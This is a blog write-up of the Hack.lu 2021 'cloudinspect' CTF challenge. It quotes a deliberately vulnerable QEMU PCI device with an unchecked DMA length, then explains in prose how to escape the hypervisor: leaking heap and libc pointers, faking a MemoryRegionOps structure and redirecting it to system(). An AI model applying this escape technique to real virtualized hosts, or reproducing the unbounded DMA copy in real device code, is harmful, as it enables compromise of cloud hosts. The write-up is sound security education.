blog of bosh mainly cybersec

Escaping the Hypervisor: CloudInspect

To get a better grasp of how QEMU (an open-source hypervisor) internals work for a research project, I decided to upsolve cloudinspect from Hack.lu 2021.

The challenge is simple in concept: an out-of-bounds write and read on the hypervisor heap, caused by a custom PCI device.

Background and Vulnerability

We are given the source code (in the form of a patchfile) to a custom PCI device. QEMU gives each of these devices a dedicated memory region, and we interact with it by writing to MMIO (memory-mapped I/O) register offsets.

There is a global state struct of type CloudInspectState, which can be seen as follows:

+struct CloudInspectState {
+    PCIDevice pdev;
+    MemoryRegion mmio;
+    AddressSpace *as;
+
+    struct dma_state {
+        dma_addr_t src;
+        dma_addr_t dst;
+        dma_addr_t cnt;
+        dma_addr_t cmd;
+    } dma;
+    char dma_buf[DMA_SIZE];
+};

Note that there are four values that are tracked here, src, dst, cnt, and cmd.

The next important fact is that we see a MemoryRegionOps, which contains metadata as well as handlers for QEMU to run whenever there is a read or write to a memory region.

+static const MemoryRegionOps cloudinspect_mmio_ops = {
+    .read = cloudinspect_mmio_read,
+    .write = cloudinspect_mmio_write,
+    .endianness = DEVICE_NATIVE_ENDIAN,
+    .valid = {
+        .min_access_size = 4,
+        .max_access_size = 8,
+    },
+    .impl = {
+        .min_access_size = 4,
+        .max_access_size = 8,
+    },
+
+};

In this case, we see that reading from the address space given to the PCI device is handled by cloudinspect_mmio_read, and writing is handled similarly.

The function signature for the read/write handlers are similar:

static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size)

static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)

The opaque pointer is a pointer to the current CloudInspectState object, and the addr value is the offset into the address space of the device. The val value for cloudinspect_mmio_write is the value being written.

Now, depending on the value of addr (where we are reading/writing to), different behaviors result.

For example, if we want to write to the CMD register, we would write any value we want to offset CLOUDINSPECT_MMIO_OFFSET_CMD. This will just allow us to control the values inside the structure, which are used by the DMA handler.

We can also trigger a DMA (direct memory access) operation by reading or writing a value to CLOUDINSPECT_MMIO_OFFSET_TRIGGER. This calls cloudinspect_DMA_op, which in turn calls cloudinspect_dma_rw if the CMD register is set correctly.

The function cloudinspect_dma_rw is where the actual vulnerability lies.

+static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write)
+{
+    if (write) {
+        uint64_t dst = cloudinspect->dma.dst;
+        // DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device
+        dma_memory_read(cloudinspect->as, cloudinspect->dma.src, cloudinspect->dma_buf + dst, cloudinspect->dma.cnt);
+    } else {
+        uint64_t src = cloudinspect->dma.src;
+        // DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device
+        dma_memory_write(cloudinspect->as, cloudinspect->dma.dst, cloudinspect->dma_buf + src, cloudinspect->dma.cnt);
+    }
+}

Note that we can read out of bounds, as cloudinspect->dma.cnt is used without checking that it does not go past the end of the dma_buf array.

However, we do have to be careful. In the case of reading values (the call to dma_memory_write), it tries to read bytes from cloudinspect->dma_buf + src into cloudinspect->dma.dst. This means that we must properly set cloudinspect->dma.dst to be a physical memory address (at least in the eyes of QEMU) or else we will write to an invalid address.

Exploitation

The plan for exploitation is rather straightforward. We will first map a buffer which will serve as our communication gateway to the driver. Then, we will map another one which will be used by us and the DMA handler to send values. We’ll need the physical address of the second buffer, which we can find by reading from /proc/self/pagemap.

Then, we will leak the cloudinspect->opaque pointer. This pointer points to the cloudinspect object itself. Remember that along with our out-of-bounds read, we also have a negative-index read by setting the SRC register to be negative.

As the cloudinspect object itself on the heap, we now can achieve an arbitrary read/write because we can just compute the correct relative index from cloudinspect->buf to any (physical) address we want.

In order to leak the hypervisor’s libc pointer, we can dump values from past the end of cloudinspect->buf until we find one that is in the same range as the binary, and noted the offset. Then, all we need to do is to use our arbitrary read to read pointers off from the Global Offset Table of the hypervisor.

Since the hypervisor had all protections enabled, it was not possible to just change a value in the GOT. Additionally, we can’t just overwrite the current read/write handlers because the structure containing them is in read-only memory. However, we can control program flow by faking our own MemoryRegionOps structure and changing the cloudinspect->mmio.ops pointer to our faked structure.

We can exploit the fact that cloudinspect->opaque is passed in to the read and write handlers. By setting the handlers to system, we can redirect control flow to a call to system(). We’ll also need to write the command cat flag onto the heap somewhere, so we can call system() on it by overwriting cloudinspect->opaque.

Then all we have to do is try to read from mmio, and we’ll get the flag back!

You can find the full exploit script here, along with marginal comments.